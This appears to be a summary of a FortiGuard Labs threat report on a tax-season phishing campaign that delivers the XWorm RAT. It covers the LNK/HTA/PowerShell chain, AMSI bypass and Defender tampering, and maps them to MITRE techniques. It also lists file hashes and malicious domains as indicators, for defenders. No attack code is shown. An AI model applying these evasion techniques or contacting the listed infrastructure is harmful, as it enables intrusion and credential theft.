Fortinet FortiGuard Labs details a tax-season campaign delivering the XWorm RAT via malicious tax documents, LNK files, and HTA/Powershell chains. The article describes the infection flow, defense-evasion tricks, multiple variants, and indicators to help defenders identify and block these scams. #XWorm #AsyncRAT
Keypoints
- The campaign uses tax-season themes and open directories (e.g., www.farmaciasmv.com/citrix/2022%20tax_documents.zip) to host malicious payloads.
- The ZIP contains decoy Excel/PDF files and a malicious LNK that launches a chain (LNK → note.hta → PowerShell download) to install payloads.
- The infection chain leverages HTA/PowerShell and VBScript components to download and execute further payloads from remote hosts.
- FortiGuard observed AMSI bypass and extensive Defender configuration changes to hamper security (exclusions, ASR, firewall, and service controls).
- XWorm is a commodity RAT with HVNC capabilities, screen capture, keylogging, and file encryption features.
- Additional tax-themed variants (Mary tax docs.pdf.lnk, Wilson tax_docs.pdf.lnk, TaxReturn2022 artifacts) indicate multiple campaigns and templates.
MITRE Techniques
- [T1566.002] Spearphishing Link – Lure victims with malicious links in spam emails; “victims were likely lured via malicious links in spam emails.”
- [T1218.005] Signed Binary Proxy Execution: Mshta – Use MSHTA.exe to execute nested PowerShell actions; “MSHTA.exe to run PowerShell code to run py.ps1.”
- [T1059.001] PowerShell – PowerShell used to download and execute remote payloads; “PowerShell to download another remote file hosted on …”
- [T1059.005] Visual Basic – VBScript used in the chain to create and run scripts; “test.vbs creates %usertemp%Note.txt …”
- [T1059.007] HTML Application – HTA-based components drive further execution; “note.hta uses PowerShell to download another remote file.”
- [T1105] Ingress Tool Transfer – The dropper/downloader retrieves remote payloads; “downloads another remote file …”
- [T1055] Process Injection – Reflective loading to inject XWorm into memory; “loads a binary into memory that injects XWorm RAT.”
- [T1562.001] Impair Defenses – AMSI bypass and related bypass techniques; “AMSI bypass”
- [T1562.004] Impair Defenses – Disables Defender features and firewall; “Disables Windows Defender features”
- [T1136] Create Account – Creates a new user “System32” and adds to Administrators/Remote Desktop Users; “Creates a user named ‘System32’ …”
- [T1021] Remote Services – HVNC usage to control machines; “abusing Virtual Network Computing (VNC), HVNC.”
- [T1486] Data Encrypted for Impact – Encrypts files as part of the payload behavior; “encrypts files”
- [T1113] Screen Capture – Capability to take screenshots of the compromised host; “taking screenshots”
- [T1115] Clipboard Data – Clipboard data theft feature for crypto addresses; “clipboard for crypto wallet address swapping”
- [T1056.001] Keyboard Capture – Keylogging functionality to steal credentials and data; “keylogging”
Indicators of Compromise
- [File IOCs] – 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0, a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a, and 2 more hashes
- [Network IOCs] – farmaciasmv.com, datacenter002.myftp.biz
Read more: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large